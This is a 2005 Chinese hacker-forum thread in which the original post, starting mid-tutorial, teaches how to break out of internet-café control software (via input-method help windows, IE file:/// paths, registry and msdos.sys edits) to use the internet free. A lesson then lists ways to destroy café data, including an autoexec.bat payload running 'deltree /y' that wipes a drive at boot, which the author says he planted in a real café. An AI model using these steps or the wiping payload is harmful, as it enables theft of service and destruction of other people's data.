黑色海岸线论坛 - Powered by Discuz! Board

标题: 网吧的常见漏洞及利用 [打印本页]

作者: 黑！真黑 时间: 2005-10-7 09:28 标题: 网吧的常见漏洞及利用

[这个贴子最后由木鸭子在 2005/10/08 04:22pm 第 6 次编辑]

"DisableRegistryTools"=dword:01000000
将文件另存为“1.reg”，把它双击安装后就可以使用注册表编辑器了。刚才提到怎样解除“F5”的限制，利用“帮助”漏洞来解除可以，但是我想利用“快速提示”漏洞。
第三课　“输入法”中的“快速提示”漏洞
这节课教大家什么？嗯！是“输入法”中的“快速提示”漏洞，目前仅有“五笔加加”输入法有这个漏洞。照上节课教的，不过这次要大家找的是“快速提示”，而不是“帮助”，切换输入法，找到“快速提示”后单击它，这时出现一个IE窗口（不是太菜的你应该知道干什么用的，上网用的呗！），鼠标移动范围被限制了，破解它（上节课教过了，但是如果IE窗口是最大化的，则应该先在控制菜单中选择“恢复为小窗口”后再“移动”，再按“回车”），这样便可免费上网了，需要打开桌面，最简单的方法是：在IE地址栏上输入“桌面”（回车）。回顾一下第一节课主要说了什么……嗯！利用“F5”漏洞免费上网，大多被屏蔽掉了，第二节课说过要利用“快速提示”漏洞来解除它。怎么做呢？（大家笔拿起来做些笔记），“msdos.sys”文件在C盘根目录下一般是以“隐藏”和“只读”形式储存的，我们需要先去掉它的“只读”属性，要不然无法对它做任何修改，在IE地址栏上输入“file:///C:/command.com”回车，打开“ms-dos方式”，在提示符下输入 “attrib -r c:\msdos.sys”(回车)以去掉“只读”属性，再返回到IE地址栏上输入“file:///C:/msdos.sys”（回车），把“打开方式”设为“记事本”，把“option”下的“BootKeys”的值改为“1”，保存退出。重新启动计算机便可使修改生效。
上面讲的都是以“网吧管理专家”网管软件为例，如果是“美萍”控制的计算机，得先打开“开始→会员登陆”，接下来与“网吧管理专家”操作过程相同。再补充一点，其实免费上网还有一种方法，不过成功率不高，就是使网管软件出错，我是用键盘上的“Ctrl、Shift、Alt”三个键中任一键或任两键配合其他键狂按，结果网管软件报错退出,“我的电脑”和“回收站”等都出现在桌面上了。
第四课　一些破坏网吧数据的方法（那位耳朵伸得那么长，想必是网德不善者）。
破坏1（破坏级别：中）：
在IE“地址栏”或“jump to URL”中输入“file：///c：/windows/control.exe”，打开“控制面板→ 添加/删除程序”，卸载掉你“感兴趣”的应用程序。
破坏2（破坏级别：中→高）：
为了防止文件被删除，网管软件一般都屏蔽了鼠标右键，并且连键盘上的“Delete”和“Shift+Delete”也无效，不过据我所知，在“网吧管理专家”控制下的数据可以用“Ctrl+D”来删除。
破坏3（破坏级别：高）：
修改C盘根目录下的“autoexec.bat”文件为如下代码：
@echo off
path=c:\windows;c:\windows\command
smartdrv >nul
deltree /y D:\. >nul
这些代码是我前段时间在某网吧里预留的，后果只是使硬盘D分区的数据全部丢失而已，但计算机仍可启动（因为操作系统被装在C盘），若将第四段代码的“D:”改为“C:”，有什么后果？你试试就知道了，像我这样心地善良，乐于助人的人，是不会那么做的。

谢谢管理员绿茶之星删了我的贴```
但是我还是觉得委屈````
:em15: :em15: :em15:

作者: 木鸭子 时间: 2005-10-8 16:23 标题: 网吧的常见漏洞及利用

支持一下~嘿!谢谢~

作者: 等待LOVE 时间: 2005-10-8 23:32 标题: 网吧的常见漏洞及利用

无用了。。。我这按F5和F8都要密码才可以进得去。。。

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)